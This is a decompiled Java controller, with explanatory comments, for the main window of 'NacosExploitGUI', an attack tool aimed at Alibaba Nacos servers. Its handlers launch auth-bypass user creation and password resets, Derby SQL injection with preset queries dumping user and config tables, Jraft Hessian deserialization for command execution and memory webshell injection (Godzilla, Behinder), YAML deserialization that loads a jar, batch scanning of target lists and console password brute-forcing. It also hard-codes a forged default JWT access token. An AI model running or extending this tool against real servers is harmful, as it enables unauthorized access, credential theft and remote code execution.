package com.alibaba.nacos.controller;

import ch.qos.logback.core.pattern.color.ANSIConstants;
import com.alibaba.nacos.common.NacosExploit;
import com.alibaba.nacos.common.NacosInfo;
import com.alibaba.nacos.entity.ExecutionResult;
import com.alibaba.nacos.entity.TableViewResult;
import com.alibaba.nacos.entity.Vulnerability;
import com.alibaba.nacos.service.VulBatchCheckTask;
import com.alibaba.nacos.service.VulExploitTask;
import com.alibaba.nacos.service.VulScanTask;
import com.alibaba.nacos.utils.DialogUtils;
import com.alibaba.nacos.utils.ExpList;
import com.alibaba.nacos.utils.ExportUtils;
import com.alibaba.nacos.utils.FileImportManager;
import com.alibaba.nacos.utils.Logger;
import com.alibaba.nacos.utils.URLParser;
import com.alipay.remoting.config.Configs;
import java.awt.Desktop;
import java.io.File;
import java.net.URI;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.Objects;
import javafx.collections.FXCollections;
import javafx.event.ActionEvent;
import javafx.fxml.FXML;
import javafx.scene.control.Button;
import javafx.scene.control.ComboBox;
import javafx.scene.control.ContextMenu;
import javafx.scene.control.MenuItem;
import javafx.scene.control.ProgressBar;
import javafx.scene.control.SingleSelectionModel;
import javafx.scene.control.Tab;
import javafx.scene.control.TableColumn;
import javafx.scene.control.TableView;
import javafx.scene.control.TextArea;
import javafx.scene.control.TextField;
import javafx.scene.control.cell.PropertyValueFactory;
import javafx.scene.input.Clipboard;
import javafx.scene.input.ClipboardContent;
import javafx.stage.FileChooser;
import javafx.stage.Stage;
import javax.xml.transform.OutputKeys;
import org.apache.commons.codec.language.bm.Rule;
import org.apache.commons.io.IOUtils;
import org.apache.commons.math3.optimization.direct.CMAESOptimizer;

/* loaded from: input_file:com/alibaba/nacos/controller/MainController.class */
/**
 * JavaFX controller for the main window of this (decompiled) Nacos testing GUI.
 *
 * <p>Every field annotated {@code @FXML} is injected from the FXML layout, and every
 * {@code @FXML} method is an event handler wired to a control in that layout; their
 * names are therefore part of the external interface and must not be renamed.
 * The handlers themselves hold no protocol logic: they read the form fields, guard on
 * {@link VulExploitTask#check_scan_end(String)} / a selected vulnerability name, and
 * delegate to {@link NacosExploit}, {@link ExpList} or one of the task classes, writing
 * results into the matching {@link TextArea}.
 *
 * <p>Decompiler artefacts to be aware of when reading this class: several plain
 * literals were resolved to unrelated library constants whose value happens to match
 * ({@code Rule.ALL}, {@code OutputKeys.VERSION}, {@code IOUtils.LINE_SEPARATOR_UNIX},
 * {@code CMAESOptimizer.DEFAULT_STOPFITNESS}, the {@code Configs}/{@code ANSIConstants}
 * thread-count strings), and some locals survive only as discarded expressions.
 */
public class MainController {

    // Result / output areas. initialize() makes all of them read-only except txt_vul_desc's
    // siblings that are never written here (txt_yaml_result etc. are also read-only).
    @FXML
    private TextArea txt_exploit_result;

    @FXML
    private TextArea txt_yaml_result;

    @FXML
    private TextArea txt_brute_result;

    @FXML
    private TextArea txt_vul_check;

    @FXML
    private TextArea txt_cmd_result;

    @FXML
    private TextArea txt_vul_desc;

    @FXML
    private TextArea txt_sqli_result;

    @FXML
    private TextArea txt_vul_batch_check;

    // User-supplied target and parameters. txt_nacos_path / txt_nacos_version are filled by
    // vul_scan() and act as the "current target" that every other handler reads back.
    @FXML
    private TextField txt_target_url;

    @FXML
    private TextField txt_dataId;

    @FXML
    private TextField txt_group;

    @FXML
    private TextField txt_jar_path;

    @FXML
    private TextField txt_accessToken;

    @FXML
    private TextField txt_cmd;

    @FXML
    private TextField txt_user;

    @FXML
    private TextField txt_pwd;

    @FXML
    private TextField txt_nacos_path;

    @FXML
    private TextField txt_nacos_version;

    @FXML
    private TextField txt_jraftIP;

    @FXML
    private TextField txt_jraftPort;

    @FXML
    private TextField txt_shell_pwd;

    // Paths of the imported list files (set by the batch_import_* handlers, read-only in the UI).
    @FXML
    private TextField txt_url_file;

    @FXML
    private TextField txt_brute_user;

    @FXML
    private TextField txt_brute_pwd;

    // Selection controls; their items are populated in initialize().
    @FXML
    private ComboBox<String> comboBox_vul;

    @FXML
    private ComboBox<String> comboBox_nacos_type;

    @FXML
    private ComboBox<String> comboBox_sqli;

    @FXML
    private ComboBox<String> comboBox_filtershell;

    @FXML
    private ComboBox<String> comboBox_thread;

    // Tabs that handlers bring to the front before writing into them.
    @FXML
    private Tab tab_vul_check;

    @FXML
    private Tab tab_vul_desc;

    // Only used to reach the owning Stage for the FileChooser dialogs.
    @FXML
    private Button btn_import_url;

    @FXML
    private Button btn_import_pwd;

    @FXML
    private Button btn_import_user;

    // Batch-scan result table and its columns (bound to TableViewResult properties in initialize()).
    @FXML
    private TableView<TableViewResult> resultTableView;

    @FXML
    private TableColumn<TableViewResult, String> Column_id;

    @FXML
    private TableColumn<TableViewResult, String> Column_url;

    @FXML
    private TableColumn<TableViewResult, String> Column_version;

    @FXML
    private TableColumn<TableViewResult, String> Column_vulName;

    @FXML
    private ProgressBar progressBar;
    // Process-wide, mutable proxy settings shared with ProxyController (see proxy_set()).
    // Being public static and non-synchronized, any class may read or replace entries at any time.
    public static Map<String, String> currentProxy = new HashMap();
    // Not referenced anywhere in this class; presumably assigned by the application bootstrap.
    private Stage mainStage;

    /**
     * Post-injection setup (JavaFX calls {@code initialize()} once the {@code @FXML} fields are set).
     *
     * <p>Binds the result-table columns to {@link TableViewResult} bean properties, seeds every
     * combo box with its choices and a default selection, fills default text into the target
     * fields, and marks all output areas and file-path fields non-editable.
     */
    public void initialize() {
        // PropertyValueFactory looks up getId()/getUrl()/getVersion()/getVulName() on TableViewResult.
        this.Column_id.setCellValueFactory(new PropertyValueFactory("id"));
        this.Column_url.setCellValueFactory(new PropertyValueFactory("url"));
        // OutputKeys.VERSION is the decompiler's stand-in for the literal "version".
        this.Column_version.setCellValueFactory(new PropertyValueFactory(OutputKeys.VERSION));
        this.Column_vulName.setCellValueFactory(new PropertyValueFactory("vulName"));
        // Rule.ALL stands in for the literal "ALL": the "every vulnerability" choice used by
        // get_vul_description() and the scan tasks.
        this.comboBox_vul.setValue(Rule.ALL);
        this.comboBox_vul.getItems().add(Rule.ALL);
        this.comboBox_vul.getItems().addAll(ExpList.get_exp());
        // Thread-count choices for the batch scan; the three library constants are presumably
        // the strings "20", "30" and "50" resolved by the decompiler.
        this.comboBox_thread.setValue("100");
        this.comboBox_thread.getItems().addAll("1", Configs.TP_MIN_SIZE_DEFAULT, ANSIConstants.BLACK_FG, Configs.CONN_CREATE_TP_QUEUE_SIZE_DEFAULT, "100", "150", "200");
        // Placeholder shown until vul_scan() has identified a target.
        this.txt_nacos_path.setText("未启动");
        this.txt_cmd.setText("whoami");
        this.txt_jraftPort.setText("7848");
        this.txt_shell_pwd.setText("暂不支持自定义");
        this.txt_group.setText("DEFAULT_GROUP");
        // Hard-coded JWT-shaped literal used as the default access token for client_yaml_deser().
        this.txt_accessToken.setText("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q");
        // Output areas and derived fields are display-only.
        this.txt_vul_desc.setEditable(false);
        this.txt_vul_check.setEditable(false);
        this.txt_vul_batch_check.setEditable(false);
        this.comboBox_thread.setEditable(false);
        this.txt_url_file.setEditable(false);
        this.txt_exploit_result.setEditable(false);
        this.txt_nacos_path.setEditable(false);
        this.txt_nacos_version.setEditable(false);
        this.txt_sqli_result.setEditable(false);
        this.txt_cmd_result.setEditable(false);
        this.txt_shell_pwd.setEditable(false);
        this.txt_brute_pwd.setEditable(false);
        this.txt_brute_user.setEditable(false);
        this.txt_yaml_result.setEditable(false);
        this.txt_brute_result.setEditable(false);
        this.comboBox_nacos_type.setItems(FXCollections.observableArrayList("windows", "linux"));
        this.comboBox_nacos_type.setValue("linux");
        this.comboBox_filtershell.setItems(FXCollections.observableArrayList(Rule.ALL, "CMD马", "哥斯拉", "冰蝎"));
        this.comboBox_filtershell.setValue(Rule.ALL);
        // Fixed query list offered to exec_sqli(); the selected string is passed through unchanged.
        this.comboBox_sqli.setItems(FXCollections.observableArrayList("select * from users", "select * from permissions", "select * from roles", "select * from tenant_info", "select * from tenant_capacity", "select * from group_capacity", "select * from config_tags_relation", "select * from app_configdata_relation_pubs", "select * from app_configdata_relation_subs", "select * from app_list", "select * from config_info_aggr", "select * from config_info_tag", "select * from config_info_beta", "select * from his_config_info", "select * from config_info"));
        this.comboBox_sqli.setValue("select * from users");
    }

    /** Opens the proxy-configuration window, handing it the shared {@link #currentProxy} map. */
    @FXML
    void proxy_set(ActionEvent actionEvent) {
        ProxyController.createProxyUI(currentProxy);
    }

    /**
     * Resets every output area, the result table and the progress bar.
     * Input fields (target URL, credentials, file paths) are left untouched.
     */
    @FXML
    void clear(ActionEvent actionEvent) {
        this.txt_exploit_result.clear();
        this.txt_nacos_path.clear();
        this.txt_nacos_version.clear();
        this.txt_cmd_result.clear();
        this.txt_sqli_result.clear();
        this.txt_vul_check.clear();
        this.txt_vul_desc.clear();
        this.txt_brute_result.clear();
        this.txt_vul_batch_check.clear();
        this.resultTableView.getItems().clear();
        // DEFAULT_STOPFITNESS is the decompiler's stand-in for the literal 0.0.
        this.progressBar.setProgress(CMAESOptimizer.DEFAULT_STOPFITNESS);
        this.txt_yaml_result.clear();
    }

    /** Shows the "contact the author" dialog. */
    @FXML
    void showContactAuthor(ActionEvent actionEvent) {
        DialogUtils.showContactAuthorDialog();
    }

    /**
     * Displays the description text of the selected vulnerability in the description tab,
     * or of every known vulnerability when the "ALL" entry is selected.
     *
     * <p>Relies on {@code comboBox_vul} having a selection; {@link #initialize()} sets one,
     * so {@code selectedItem} is non-null unless the selection was cleared elsewhere.
     */
    @FXML
    void get_vul_description(ActionEvent actionEvent) {
        this.tab_vul_desc.getTabPane().getSelectionModel().select((SingleSelectionModel<Tab>) this.tab_vul_desc);
        String selectedItem = this.comboBox_vul.getSelectionModel().getSelectedItem();
        if (!selectedItem.startsWith(Rule.ALL)) {
            this.txt_vul_desc.setText(IOUtils.LINE_SEPARATOR_UNIX + ExpList.getPayload(selectedItem).getInfo());
            return;
        }
        // Raw cast: assumes ExpList.get_exp() returns an ArrayList (ClassCastException otherwise).
        ArrayList arrayList = (ArrayList) ExpList.get_exp();
        this.txt_vul_desc.setText("");
        Iterator it = arrayList.iterator();
        while (it.hasNext()) {
            // Each entry is followed by a separator line.
            this.txt_vul_desc.appendText(ExpList.getPayload((String) it.next()).getInfo() + "=================================================================\n");
        }
    }

    /**
     * Identifies the target entered in {@code txt_target_url} and starts a background
     * {@link VulScanTask} against it.
     *
     * <p>If {@code txt_nacos_path} already holds a base URL equal to the entered text the
     * previous identification is reused; otherwise, when the text parses as a URL,
     * {@link NacosInfo#get_nacos_url} / {@link NacosInfo#get_version} are called synchronously
     * from this handler (presumably on the JavaFX thread) to fill the target fields first.
     * Note that the button is re-enabled immediately after the scan thread is started, not
     * when the scan finishes.
     */
    @FXML
    void vul_scan(ActionEvent actionEvent) {
        Button button = (Button) actionEvent.getSource();
        button.setDisable(true);
        String text = this.txt_target_url.getText();
        boolean checkTheURL = URLParser.checkTheURL(text);
        this.tab_vul_check.getTabPane().getSelectionModel().select((SingleSelectionModel<Tab>) this.tab_vul_check);
        String baseUrl = URLParser.getBaseUrl(this.txt_nacos_path.getText());
        if (Objects.equals(baseUrl, text)) {
            // Same target as last time: skip identification and scan directly.
            this.txt_jraftIP.setText(URLParser.getHost(baseUrl));
            new Thread(new VulScanTask(this.comboBox_vul, this.txt_nacos_path, this.txt_vul_check)).start();
        } else if (checkTheURL) {
            String str = NacosInfo.get_nacos_url(URLParser.resetURL(text), URLParser.getUri(text));
            if (str != null) {
                // The resolved URL becomes the "current target" read by every other handler.
                this.txt_nacos_path.setText(str);
                this.txt_nacos_version.setText(NacosInfo.get_version(str));
                this.txt_jraftIP.setText(URLParser.getHost(str));
                new Thread(new VulScanTask(this.comboBox_vul, this.txt_nacos_path, this.txt_vul_check)).start();
            } else {
                this.txt_nacos_path.setText("未识别出Nacos的指纹,不启动漏洞扫描");
                this.txt_nacos_version.setText("");
            }
        }
        // An invalid URL falls through silently: nothing is written to the UI in that case.
        button.setDisable(false);
    }

    /** Shows the static usage hint dialog. */
    @FXML
    void instruction(ActionEvent actionEvent) {
        DialogUtils.showInformationDialog("提示", null, "师傅们觉得好用的话就点点Star, 后续会继续优化及其poc添加");
    }

    /**
     * Opens the project page in the system browser; any failure (no Desktop support,
     * browse error) is reported through an error dialog instead of propagating.
     */
    @FXML
    void address(ActionEvent actionEvent) {
        try {
            Desktop.getDesktop().browse(new URI("https://github.com/charonlight/NacosExploitGUI"));
        } catch (Exception e) {
            DialogUtils.showErrorDialog("错误", "发生错误", "无法打开默认浏览器，请手动访问 https://github.com/charonlight");
        }
    }

    /**
     * Runs the "add_user" action of the selected vulnerability against the current target
     * with the user/password fields, once {@code check_scan_end} accepts the target.
     *
     * @throws Exception whatever {@link NacosExploit#exploit} propagates
     */
    @FXML
    void add_user(ActionEvent actionEvent) throws Exception {
        String text = this.txt_nacos_path.getText();
        if (VulExploitTask.check_scan_end(text)) {
            NacosExploit.exploit("add_user", this.comboBox_vul.getSelectionModel().getSelectedItem(), text, this.txt_user.getText(), this.txt_pwd.getText(), this.txt_exploit_result);
        }
    }

    /**
     * Same flow as {@link #add_user} with the "del_user" action.
     *
     * @throws Exception whatever {@link NacosExploit#exploit} propagates
     */
    @FXML
    void del_user(ActionEvent actionEvent) throws Exception {
        String text = this.txt_nacos_path.getText();
        if (VulExploitTask.check_scan_end(text)) {
            NacosExploit.exploit("del_user", this.comboBox_vul.getSelectionModel().getSelectedItem(), text, this.txt_user.getText(), this.txt_pwd.getText(), this.txt_exploit_result);
        }
    }

    /**
     * Same flow as {@link #add_user} with the "reset_pwd" action.
     *
     * @throws Exception whatever {@link NacosExploit#exploit} propagates
     */
    @FXML
    void reset_pwd(ActionEvent actionEvent) throws Exception {
        String text = this.txt_nacos_path.getText();
        if (VulExploitTask.check_scan_end(text)) {
            NacosExploit.exploit("reset_pwd", this.comboBox_vul.getSelectionModel().getSelectedItem(), text, this.txt_user.getText(), this.txt_pwd.getText(), this.txt_exploit_result);
        }
    }

    /**
     * Runs the query selected in {@code comboBox_sqli} through the Derby-injection payload and
     * logs the response (or a failure line) to {@code txt_sqli_result}.
     *
     * <p>The vulnerability combo box must hold exactly the Derby entry; any other selection
     * produces an error dialog and returns. The comparison is an exact string match against
     * the display name, so it breaks silently if that name is edited in {@link ExpList}.
     *
     * @throws Exception whatever the payload's {@code exploit} propagates
     */
    @FXML
    void exec_sqli(ActionEvent actionEvent) throws Exception {
        if (VulExploitTask.check_scan_end(this.txt_nacos_path.getText())) {
            String selectedItem = this.comboBox_vul.getSelectionModel().getSelectedItem();
            if (!selectedItem.equals("Nacos Derby SQL 注入漏洞(CNVD-2020-67618)")) {
                DialogUtils.showErrorDialog("提示", "漏洞选择错误", "请选择能利用的漏洞Nacos Derby SQL注入漏洞");
                return;
            }
            String text = this.txt_nacos_path.getText();
            String selectedItem2 = this.comboBox_sqli.getSelectionModel().getSelectedItem();
            ExecutionResult exploit = ExpList.getPayload(selectedItem).exploit(text, selectedItem2);
            if (exploit.getResult()) {
                Logger.logInfo(this.txt_sqli_result, selectedItem2 + IOUtils.LINE_SEPARATOR_UNIX + exploit.getResponse());
            } else {
                Logger.logInfo(this.txt_sqli_result, "漏洞利用失败");
            }
        }
    }

    /**
     * Jraft/Hessian handler with the "check_shell" action: requires the Hessian entry to be
     * selected, then passes command, jraft host/port and OS type to the payload and logs the
     * outcome to {@code txt_cmd_result}. {@link #execute_cmd} and {@link #filter_shell_inject}
     * are identical apart from the action string.
     *
     * @throws Exception whatever the payload's {@code exploit} propagates
     */
    @FXML
    void check_shell(ActionEvent actionEvent) throws Exception {
        String text = this.txt_nacos_path.getText();
        if (VulExploitTask.check_scan_end(text)) {
            String selectedItem = this.comboBox_vul.getSelectionModel().getSelectedItem();
            // Target OS choice ("windows" / "linux") from initialize().
            String selectedItem2 = this.comboBox_nacos_type.getSelectionModel().getSelectedItem();
            if (!selectedItem.equals("Nacos Jraft Hessian 反序列化漏洞(CNVD-2023-45001)")) {
                DialogUtils.showErrorDialog("提示", "漏洞选择错误", "请选择能利用的漏洞(Nacos Jraft Hessian反序列化漏洞");
                return;
            }
            ExecutionResult exploit = ExpList.getPayload(selectedItem).exploit(text, "check_shell", this.txt_cmd.getText(), this.txt_jraftIP.getText(), this.txt_jraftPort.getText(), selectedItem2);
            if (exploit.getResult()) {
                Logger.logInfo(this.txt_cmd_result, exploit.getResponse());
            } else {
                Logger.logInfo(this.txt_cmd_result, "漏洞利用失败");
            }
        }
    }

    /**
     * Same flow as {@link #check_shell} with the "execute_cmd" action.
     *
     * @throws Exception whatever the payload's {@code exploit} propagates
     */
    @FXML
    void execute_cmd(ActionEvent actionEvent) throws Exception {
        String text = this.txt_nacos_path.getText();
        if (VulExploitTask.check_scan_end(text)) {
            String selectedItem = this.comboBox_vul.getSelectionModel().getSelectedItem();
            String selectedItem2 = this.comboBox_nacos_type.getSelectionModel().getSelectedItem();
            if (!selectedItem.equals("Nacos Jraft Hessian 反序列化漏洞(CNVD-2023-45001)")) {
                DialogUtils.showErrorDialog("提示", "漏洞选择错误", "请选择能利用的漏洞(Nacos Jraft Hessian反序列化(CNVD-2023-45001))");
                return;
            }
            ExecutionResult exploit = ExpList.getPayload(selectedItem).exploit(text, "execute_cmd", this.txt_cmd.getText(), this.txt_jraftIP.getText(), this.txt_jraftPort.getText(), selectedItem2);
            if (exploit.getResult()) {
                Logger.logInfo(this.txt_cmd_result, exploit.getResponse());
            } else {
                Logger.logInfo(this.txt_cmd_result, "漏洞利用失败");
            }
        }
    }

    /**
     * Same flow as {@link #check_shell} with the "filter_shell_inject" action.
     * Note that {@code comboBox_filtershell} is not read here; only the command and
     * jraft fields are passed on.
     *
     * @throws Exception whatever the payload's {@code exploit} propagates
     */
    @FXML
    void filter_shell_inject(ActionEvent actionEvent) throws Exception {
        String text = this.txt_nacos_path.getText();
        if (VulExploitTask.check_scan_end(text)) {
            String selectedItem = this.comboBox_vul.getSelectionModel().getSelectedItem();
            String selectedItem2 = this.comboBox_nacos_type.getSelectionModel().getSelectedItem();
            if (!selectedItem.equals("Nacos Jraft Hessian 反序列化漏洞(CNVD-2023-45001)")) {
                DialogUtils.showErrorDialog("提示", "漏洞选择错误", "请选择能利用的漏洞(Nacos Jraft Hessian反序列化漏洞");
                return;
            }
            ExecutionResult exploit = ExpList.getPayload(selectedItem).exploit(text, "filter_shell_inject", this.txt_cmd.getText(), this.txt_jraftIP.getText(), this.txt_jraftPort.getText(), selectedItem2);
            if (exploit.getResult()) {
                Logger.logInfo(this.txt_cmd_result, exploit.getResponse());
            } else {
                Logger.logInfo(this.txt_cmd_result, "漏洞利用失败");
            }
        }
    }

    /**
     * Lets the user pick a {@code .txt} file of target URLs, stores its absolute path in
     * {@code txt_url_file} and reports the line count.
     *
     * <p>The extension check is by file name only; the file is read once here (to count
     * lines) and again by {@link #vul_batch_scan}. {@link #batch_import_user} and
     * {@link #batch_import_pwd} are copies of this method targeting the other path fields.
     */
    @FXML
    public void batch_import_url() {
        Stage stage = (Stage) this.btn_import_url.getScene().getWindow();
        FileChooser fileChooser = new FileChooser();
        fileChooser.setTitle("Select URL File");
        fileChooser.getExtensionFilters().add(new FileChooser.ExtensionFilter("TXT files (*.txt)", "*.txt"));
        File showOpenDialog = fileChooser.showOpenDialog(stage);
        // null when the dialog was cancelled.
        if (showOpenDialog != null) {
            if (!showOpenDialog.getName().toLowerCase().endsWith(".txt")) {
                DialogUtils.showInformationDialog("提示", "错误提示", "请选择一个TXT文件！");
            } else {
                this.txt_url_file.setText(showOpenDialog.getAbsolutePath());
                DialogUtils.showInformationDialog("提示", "导入提示", "成功导入" + URLParser.read_file_url(showOpenDialog.getAbsolutePath()).size() + "行数据！");
            }
        }
    }

    /**
     * Same as {@link #batch_import_url} but stores the chosen path in {@code txt_brute_user}.
     * The dialog title "Select URL File" is inherited from the copy it was made from.
     */
    @FXML
    public void batch_import_user() {
        Stage stage = (Stage) this.btn_import_user.getScene().getWindow();
        FileChooser fileChooser = new FileChooser();
        fileChooser.setTitle("Select URL File");
        fileChooser.getExtensionFilters().add(new FileChooser.ExtensionFilter("TXT files (*.txt)", "*.txt"));
        File showOpenDialog = fileChooser.showOpenDialog(stage);
        if (showOpenDialog != null) {
            if (!showOpenDialog.getName().toLowerCase().endsWith(".txt")) {
                DialogUtils.showInformationDialog("提示", "错误提示", "请选择一个TXT文件！");
            } else {
                this.txt_brute_user.setText(showOpenDialog.getAbsolutePath());
                DialogUtils.showInformationDialog("提示", "导入提示", "成功导入" + URLParser.read_file_url(showOpenDialog.getAbsolutePath()).size() + "行数据！");
            }
        }
    }

    /**
     * Same as {@link #batch_import_url} but stores the chosen path in {@code txt_brute_pwd}.
     * The dialog title "Select URL File" is inherited from the copy it was made from.
     */
    @FXML
    public void batch_import_pwd() {
        Stage stage = (Stage) this.btn_import_pwd.getScene().getWindow();
        FileChooser fileChooser = new FileChooser();
        fileChooser.setTitle("Select URL File");
        fileChooser.getExtensionFilters().add(new FileChooser.ExtensionFilter("TXT files (*.txt)", "*.txt"));
        File showOpenDialog = fileChooser.showOpenDialog(stage);
        if (showOpenDialog != null) {
            if (!showOpenDialog.getName().toLowerCase().endsWith(".txt")) {
                DialogUtils.showInformationDialog("提示", "错误提示", "请选择一个TXT文件！");
            } else {
                this.txt_brute_pwd.setText(showOpenDialog.getAbsolutePath());
                DialogUtils.showInformationDialog("提示", "导入提示", "成功导入" + URLParser.read_file_url(showOpenDialog.getAbsolutePath()).size() + "行数据！");
            }
        }
    }

    /**
     * Starts a {@link VulBatchCheckTask} over the de-duplicated URL list from
     * {@code txt_url_file} on a daemon thread, and installs a "Copy URL" context menu on the
     * result table.
     *
     * <p>The source button is disabled here and handed to the task together with the progress
     * bar; re-enabling it is presumably the task's responsibility, since this method never
     * does so. Passing through a {@code HashSet} drops the file's ordering. The thread count
     * comes from a non-editable combo box seeded with numeric strings, so
     * {@link Integer#parseInt} is expected to succeed.
     *
     * @throws Exception declared, though nothing in this method body throws a checked exception
     */
    @FXML
    public void vul_batch_scan(ActionEvent actionEvent) throws Exception {
        String text = this.txt_url_file.getText();
        int parseInt = Integer.parseInt(this.comboBox_thread.getSelectionModel().getSelectedItem());
        // Raw types: de-duplicate the URLs (order is not preserved).
        ArrayList arrayList = new ArrayList(new HashSet(URLParser.read_file_url(text)));
        this.progressBar.setProgress(CMAESOptimizer.DEFAULT_STOPFITNESS);
        Button button = (Button) actionEvent.getSource();
        button.setDisable(true);
        VulBatchCheckTask vulBatchCheckTask = new VulBatchCheckTask(arrayList, this.comboBox_vul, this.txt_vul_batch_check, this.resultTableView, this.progressBar, button, parseInt);
        // A fresh context menu replaces any previous one each time the scan is started.
        ContextMenu contextMenu = new ContextMenu();
        MenuItem menuItem = new MenuItem("Copy URL");
        menuItem.setOnAction(actionEvent2 -> {
            TableViewResult selectedItem = this.resultTableView.getSelectionModel().getSelectedItem();
            if (selectedItem != null) {
                String url = selectedItem.getUrl();
                Clipboard systemClipboard = Clipboard.getSystemClipboard();
                ClipboardContent clipboardContent = new ClipboardContent();
                clipboardContent.putString(url);
                systemClipboard.setContent(clipboardContent);
            }
        });
        contextMenu.getItems().add(menuItem);
        this.resultTableView.setContextMenu(contextMenu);
        // Daemon so an unfinished scan does not keep the JVM alive after the window closes.
        Thread thread = new Thread(vulBatchCheckTask);
        thread.setDaemon(true);
        thread.start();
    }

    /** Exports the current result-table rows through {@link ExportUtils#exportToExcel}. */
    @FXML
    void exportToExcel(ActionEvent actionEvent) {
        ExportUtils.exportToExcel(this.resultTableView.getItems());
    }

    /**
     * Tries every user/password pair from the two imported list files against the current
     * target with the selected payload, stopping at the first success.
     *
     * <p>Runs entirely inside the event handler (no background thread), so the UI is blocked
     * for the duration of the nested loops. {@code text3} and {@code text4} are the same
     * value read twice from {@code txt_nacos_path}. Exceptions from file reading or the
     * payload are printed to stderr only and never surface in the UI.
     */
    @FXML
    void brute_force_attack(ActionEvent actionEvent) {
        String text = this.txt_brute_user.getText();
        String text2 = this.txt_brute_pwd.getText();
        String text3 = this.txt_nacos_path.getText();
        String text4 = this.txt_nacos_path.getText();
        if (VulExploitTask.check_scan_end(text3)) {
            String selectedItem = this.comboBox_vul.getSelectionModel().getSelectedItem();
            try {
                List<String> read_file = FileImportManager.read_file(text);
                List<String> read_file2 = FileImportManager.read_file(text2);
                // Unlike the other handlers, no check that the selected entry is the matching one.
                Vulnerability payload = ExpList.getPayload(selectedItem);
                for (String str : read_file) {
                    for (String str2 : read_file2) {
                        Logger.logInfo(this.txt_brute_result, "开始爆破-----用户名: " + str + "爆破密码: " + str2);
                        ExecutionResult exploit = payload.exploit(text4, str, str2);
                        if (exploit.getResult()) {
                            Logger.logInfo(this.txt_brute_result, "爆破成功(" + str + "," + str2 + ")\n" + exploit.getResponse());
                            DialogUtils.showInformationDialog("提示", "爆破成功", "发现Nacos控制台弱口令 : (" + str + "," + str2 + ")");
                            return;
                        }
                    }
                }
            } catch (Exception e) {
                // Swallowed from the UI's point of view; only the console sees it.
                e.printStackTrace();
            }
        }
    }

    /**
     * Runs the Nacos-Client YAML payload with dataId, group, access token and jar path from
     * the form, logging the outcome to {@code txt_yaml_result}. Requires the YAML entry to be
     * selected in {@code comboBox_vul}.
     *
     * @throws Exception whatever the payload's {@code exploit} propagates
     */
    @FXML
    void client_yaml_deser(ActionEvent actionEvent) throws Exception {
        String text = this.txt_nacos_path.getText();
        if (VulExploitTask.check_scan_end(text)) {
            String selectedItem = this.comboBox_vul.getSelectionModel().getSelectedItem();
            // Discarded expression left by the decompiler (an unused local in the original); no effect.
            this.comboBox_nacos_type.getSelectionModel().getSelectedItem();
            if (!selectedItem.equals("Nacos-Client Yaml 反序列化漏洞")) {
                DialogUtils.showErrorDialog("提示", "漏洞选择错误", "请选择能利用的漏洞(Nacos-Client Yaml 反序列化漏洞)");
                return;
            }
            ExecutionResult exploit = ExpList.getPayload(selectedItem).exploit(text, this.txt_dataId.getText(), this.txt_group.getText(), this.txt_accessToken.getText(), this.txt_jar_path.getText());
            if (exploit.getResult()) {
                Logger.logInfo(this.txt_yaml_result, exploit.getResponse());
            } else {
                Logger.logInfo(this.txt_yaml_result, "漏洞利用失败");
            }
        }
    }
}
